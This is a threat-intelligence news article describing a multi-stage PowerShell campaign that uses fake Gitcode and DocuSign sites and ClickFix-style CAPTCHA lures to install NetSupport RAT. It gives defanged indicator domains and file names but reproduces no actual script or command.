New Threat: Multi-Stage PowerShell Attack Targeting Users
Overview of the Campaign
Recent alerts from threat hunters indicate an ongoing campaign that leverages deceptive websites to lure users into executing harmful PowerShell scripts. This series of attacks primarily targets individuals through social engineering tactics to stealthily install NetSupport RAT (Remote Access Trojan) malware on their devices.
Malicious Scripts on Fake Sites
According to the DomainTools Investigations (DTI) team, they have detected “malicious multi-stage downloader PowerShell scripts” on counterfeit websites posing as reputable services like Gitcode and DocuSign. The deception begins when users are tricked into copying and executing an initial PowerShell script via their Windows Run command.
Once executed, this initial script proceeds to download another downloader script, which in turn retrieves further malicious payloads and ultimately leads to the installation of the NetSupport RAT on the compromised systems.
Distribution Methods
The counterfeit websites are suspected to be spread through social engineering attempts via email and various social media platforms. These tactics are designed to exploit unsuspecting users, presenting them with false legitimacy.
The PowerShell scripts found on these fraudulent Gitcode sites are specifically designed to sequentially download additional PowerShell scripts from an external server, namely “tradingviewtool[.]com”. The execution of these scripts is a crucial step toward deploying the NetSupport RAT on affected machines.
Use of CAPTCHA for User Deception
DomainTools also uncovered multiple websites mimicking DocuSign (for instance, docusign.sa[.]com) that deliver the same malware, but with an additional layer of trickery. These sites employ ClickFix-style CAPTCHA verifications, persuading users to validate their identity as non-robots.
This process is not merely a benign check; once users engage with the CAPTCHA, an obfuscated PowerShell command is secretly copied to the clipboard. Users are then prompted to open the Windows Run dialog, paste the command, and hit Enter, inadvertently executing the malicious script.
Persistence Strategy of the Malware
The script’s main objective includes downloading a persistence script named “wbdims.exe” from GitHub. This ensures that the malware is automatically executed every time the user logs into their system. Although the payload was unavailable during DomainTools’ investigation, they noted that it checks back with the delivery site (“docusign.sa[.]com/verification/c.php”).
When it does, the site triggers a browser refresh, leading to the delivery of a second-stage PowerShell script, which further downloads and executes a ZIP payload setting the URL parameter “an” to “2”. This step involves unpacking an executable named “jp2launcher.exe,” laying the groundwork for the installation of NetSupport RAT.
Complexity of the Attack Chain
The multi-layered approach of these scripts is likely a strategy to evade detection and increase resilience against security investigations and takedown efforts. The method of scripts downloading additional scripts creates a complex execution chain that’s challenging to trace.
Association with Past Campaigns
While the direct perpetrators of this scheme remain unidentified, DomainTools noted striking similarities in the delivery URLs, domain names, and registration patterns with a campaign linked to SocGholish (also known as FakeUpdates), which surfaced in October 2024.
It’s worth mentioning that while the NetSupport Manager is a legitimate administrative tool, its misuse as a RAT by various threat groups—including FIN7, Scarlet Goldfinch, and Storm-0408—affirms the ongoing risk posed by such attacks.
Closing Thoughts
As cyber threats continue to evolve, the methods of infiltration are becoming increasingly sophisticated. Users should remain vigilant against such tactics, maintaining updated security measures while being cautious of unsolicited links and requests for script execution. Staying informed about emerging threats is vital in safeguarding personal and professional digital environments.
